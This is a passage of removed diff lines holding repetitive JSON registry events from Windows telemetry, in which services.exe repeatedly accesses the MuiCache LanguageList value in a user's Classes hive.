Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850110000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570850270000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 